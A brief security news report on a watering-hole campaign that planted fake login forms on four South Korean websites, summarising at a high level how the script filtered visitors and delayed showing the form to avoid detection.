Security researchers have come across a waterholing campaign that have compromised four South Korean websites by injecting fake login forms to steal user credentials.
Making matters worse is one of the spoofed sites is one of South Korea’s most popular search engines.
The information collected from the fraudulent login screen is then sent to a collection server, even though it lacks accurate data information which leads Trend Micro to believe this is simply a research and development situation creating the environment for a larger scam.
The first compromised site was seen on March 14. The malware creates a profile of the visitor, loads the fake login screen then scans the HTTP referrer header string and checks if it contains keywords related to popular search engines and social media sites to authenticate that the visitor is real. It then identifies the device and operating system. The malware remains in the background and does not load the spoofed login form until the user has visited the compromised site six times, which it measures through a previously set cookie. It also used used Cloudflare to protect their domains and hide their real IP addresses.
Trend Micro believes the attackers are Chinese based on the language used in the code.